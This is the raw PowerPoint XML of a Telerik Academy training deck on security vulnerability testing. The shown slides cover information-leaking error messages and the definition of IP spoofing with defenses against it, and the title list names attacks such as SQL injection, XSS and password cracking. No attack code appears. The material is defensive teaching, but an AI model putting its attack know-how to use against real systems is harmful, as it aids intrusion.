            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="http://png.findicons.com/files/icons/996/vista_alarm/256/keys.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352800" y="3733800"/>
            <a:ext cx="2438400" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6"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6372" y="5257800"/>
            <a:ext cx="2272281" cy="1476375"/>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418148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 Messages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Error messages can reveal important information about your site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Error messages like that should not be allowed:</a:t>
            </a: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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 11" descr="tomcat-erro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495153" y="3276600"/>
            <a:ext cx="4153694" cy="3034283"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glo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335409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9569" y="771236"/>
            <a:ext cx="4230831" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Error Messages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="http://www.flashdaweb.com/blog/wp-content/uploads/2009/03/png-symbol-error-256x256.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352800" y="2250209"/>
            <a:ext cx="2438400" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="5131955"/>
            <a:ext cx="4876800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="1" kern="1200" cap="none" baseline="0">
                <a:ln w="500">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FAF7C8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220701572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Golden Rule 6.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security in Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All applications throw errors every once in a while</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make sure that even in this case your application remains stable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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3078" name="Picture 6"/>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914400" y="4191000"/>
            <a:ext cx="4193557" cy="1952625"/>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9" name="Picture 7"/>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651499" y="3556464"/>
            <a:ext cx="2752867" cy="1610848"/>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6372" y="5257800"/>
            <a:ext cx="2272281" cy="1476375"/>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234047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 Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is IP address spoofing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of Internet Protocol (IP) packets with a forged source IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is the purpose?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Concealing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>identity of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mpersonating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>another computing system</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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247601116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Defense </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ingress filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>locking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of packets from outside the network with a source address inside the network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Egress filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blocking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of packets from inside the network with a source address that is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>inside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ot relying on IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for authentication</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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18337982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Telerik Academy Theme">
  <a:themeElements>
    <a:clrScheme name="Telerik Colors Theme">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000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extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Telerik Academy Theme" id="{CC62B882-3A46-4F72-8436-1D7407ADFF02}" vid="{92E024D1-C2BF-4AF7-8ED1-5C666C82BD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Telerik Academy Theme</Template>
  <TotalTime>662</TotalTime>
  <Words>4328</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>917</Paragraphs>
  <Slides>133</Slides>
  <Notes>57</Notes>
  <HiddenSlides>41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133</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="140" baseType="lpstr">
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Telerik Academy Theme</vt:lpstr>
      <vt:lpstr>Security Vulnerability Testing</vt:lpstr>
      <vt:lpstr>The Lectors</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Security Vulnerability Testing</vt:lpstr>
      <vt:lpstr>Security Testing</vt:lpstr>
      <vt:lpstr>The Bug Hypothesis</vt:lpstr>
      <vt:lpstr>The Bug Hypothesis (2)</vt:lpstr>
      <vt:lpstr>Feature or Bug</vt:lpstr>
      <vt:lpstr>Vulnerability Categories</vt:lpstr>
      <vt:lpstr>Intended vs. Implemented</vt:lpstr>
      <vt:lpstr>Reasons for Failures</vt:lpstr>
      <vt:lpstr>Security Testing in the Software Development Life Cycle</vt:lpstr>
      <vt:lpstr>Security Testing in the Software Development Life Cycle</vt:lpstr>
      <vt:lpstr>Golden Rule 1. Maximum Simplicity</vt:lpstr>
      <vt:lpstr>Characteristics of a Secure Software    </vt:lpstr>
      <vt:lpstr>Secure Software Characteristics</vt:lpstr>
      <vt:lpstr>Secure Software Characteristics (2)</vt:lpstr>
      <vt:lpstr>Threat Modeling</vt:lpstr>
      <vt:lpstr>Is Your Application “Secure”?</vt:lpstr>
      <vt:lpstr>What Does “Secure Enough” Mean to You?</vt:lpstr>
      <vt:lpstr>What is Threat Modeling?</vt:lpstr>
      <vt:lpstr>Threat Modeling Concepts</vt:lpstr>
      <vt:lpstr>Approaches to Threat Modeling</vt:lpstr>
      <vt:lpstr>Threat Modeling Steps</vt:lpstr>
      <vt:lpstr>Threat Ranking</vt:lpstr>
      <vt:lpstr>Golden Rule 2: Secure the Weakest Link</vt:lpstr>
      <vt:lpstr>Security Testing Techniques</vt:lpstr>
      <vt:lpstr>Security Testing Techniques</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (2)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (3)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (4)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (5)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (6)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (7)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (8) </vt:lpstr>
      <vt:lpstr>Security Testing Techniques (9)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (10)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (11)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (12)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (13)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (14)</vt:lpstr>
      <vt:lpstr>Security Testing Techniques (15)</vt:lpstr>
      <vt:lpstr>Popular Software Attacks</vt:lpstr>
      <vt:lpstr>            Popular Software Attacks</vt:lpstr>
      <vt:lpstr>Top Security Vulnerabilities</vt:lpstr>
      <vt:lpstr>SANS Top 15 Most Dangerous Vulnerabilities</vt:lpstr>
      <vt:lpstr>SANS Top 15 Most Dangerous Vulnerabilities (2)</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Example</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Preventing SQL Injection</vt:lpstr>
      <vt:lpstr>OS Command Injection</vt:lpstr>
      <vt:lpstr>OS Command Injection (2)</vt:lpstr>
      <vt:lpstr>OS Command Injection</vt:lpstr>
      <vt:lpstr>Golden Rule 3. Limit the Publicly Available Resources</vt:lpstr>
      <vt:lpstr>XSS – Cross-site Scripting</vt:lpstr>
      <vt:lpstr>XSS – Cross-site Scripting (2)</vt:lpstr>
      <vt:lpstr>Why XSS?</vt:lpstr>
      <vt:lpstr>Preventing XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Golden Rule 4.  Incorrect Until Proven Correct</vt:lpstr>
      <vt:lpstr>Acunetix Vulnerability Scanner</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Buffer Overflow </vt:lpstr>
      <vt:lpstr>Buffer Overflow - The Usual Victims</vt:lpstr>
      <vt:lpstr>Preventing Buffer Overflow</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Wireshark</vt:lpstr>
      <vt:lpstr>What is Wireshark?</vt:lpstr>
      <vt:lpstr>Wireshark</vt:lpstr>
      <vt:lpstr>Password Attacks</vt:lpstr>
      <vt:lpstr>Types of Password Attacks</vt:lpstr>
      <vt:lpstr>Most Frequently Used Passwords</vt:lpstr>
      <vt:lpstr>Users &amp; Passwords</vt:lpstr>
      <vt:lpstr>THC-Hydra</vt:lpstr>
      <vt:lpstr>What is THC-Hydra?</vt:lpstr>
      <vt:lpstr>Protocols supported?</vt:lpstr>
      <vt:lpstr>Type of attacks?</vt:lpstr>
      <vt:lpstr>How to install?</vt:lpstr>
      <vt:lpstr>THC-Hydra</vt:lpstr>
      <vt:lpstr>How to protect?</vt:lpstr>
      <vt:lpstr>Denial of Service Attack (DoS)</vt:lpstr>
      <vt:lpstr>Distributed Denial-of-service (DDoS) Attacks </vt:lpstr>
      <vt:lpstr>Preventing DoS</vt:lpstr>
      <vt:lpstr>Preventing DoS (2)</vt:lpstr>
      <vt:lpstr>Open Redirect</vt:lpstr>
      <vt:lpstr>URL Manipulation Attacks</vt:lpstr>
      <vt:lpstr>Why URL manipulation?</vt:lpstr>
      <vt:lpstr>URL Manipulation Example</vt:lpstr>
      <vt:lpstr>URL Manipulation Example</vt:lpstr>
      <vt:lpstr>URL Manipulation Example</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Golden Rule 5. The Principle of the "Weakest Privilege"</vt:lpstr>
      <vt:lpstr>Error Messages</vt:lpstr>
      <vt:lpstr>Error Messages</vt:lpstr>
      <vt:lpstr>Golden Rule 6. Security in Errors</vt:lpstr>
      <vt:lpstr>IP Spoofing</vt:lpstr>
      <vt:lpstr>Defense Against IP Spoofing</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>Spoofing vs. Hijacking</vt:lpstr>
      <vt:lpstr>Spoofing vs. Hijacking (2)</vt:lpstr>
      <vt:lpstr>Spoofing vs. Hijacking (3)</vt:lpstr>
      <vt:lpstr>Session Hijacking Methods</vt:lpstr>
      <vt:lpstr>Active vs. Passive Hijacking</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Protecting Against Session Hijacking</vt:lpstr>
      <vt:lpstr>Golden Rule 7. Provide Constant Defense</vt:lpstr>
      <vt:lpstr>Social Engineering</vt:lpstr>
      <vt:lpstr>Popular Social Engineering Methods</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr>Malicious E-mail Attachments</vt:lpstr>
      <vt:lpstr>Pharming</vt:lpstr>
      <vt:lpstr>“Dumpster Diving”</vt:lpstr>
      <vt:lpstr>Deception and Manipulation</vt:lpstr>
      <vt:lpstr>“Shoulder Surfing”</vt:lpstr>
      <vt:lpstr>PBX Disguise</vt:lpstr>
      <vt:lpstr>Reverse Social Engineering</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>How I Won an Online Game</vt:lpstr>
      <vt:lpstr>How I Won an Online Game</vt:lpstr>
      <vt:lpstr>What is Cryptography?</vt:lpstr>
      <vt:lpstr>Cryptographic Elements</vt:lpstr>
      <vt:lpstr>Types of Cryptography</vt:lpstr>
      <vt:lpstr>Symmetric Encryption</vt:lpstr>
      <vt:lpstr>Rainbow Tables</vt:lpstr>
      <vt:lpstr>How Rainbow Tables works?</vt:lpstr>
      <vt:lpstr>How Rainbow Tables works?(2)</vt:lpstr>
      <vt:lpstr>Salt consists of random bits, creating one of the inputs to a hash function  </vt:lpstr>
      <vt:lpstr>Symmetric Encryption</vt:lpstr>
      <vt:lpstr>Asymmetric Encryption</vt:lpstr>
      <vt:lpstr>True Crypt Demo</vt:lpstr>
      <vt:lpstr>Security Vulnerability Testing</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Vulnerability Testing</dc:title>
  <dc:creator>Asya Georgieva</dc:creator>
  <cp:lastModifiedBy>Asya Georgieva</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-05-02T08:11:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-11-13T15:32:49Z</dcterms:modified>
</cp:coreProperties>
</file>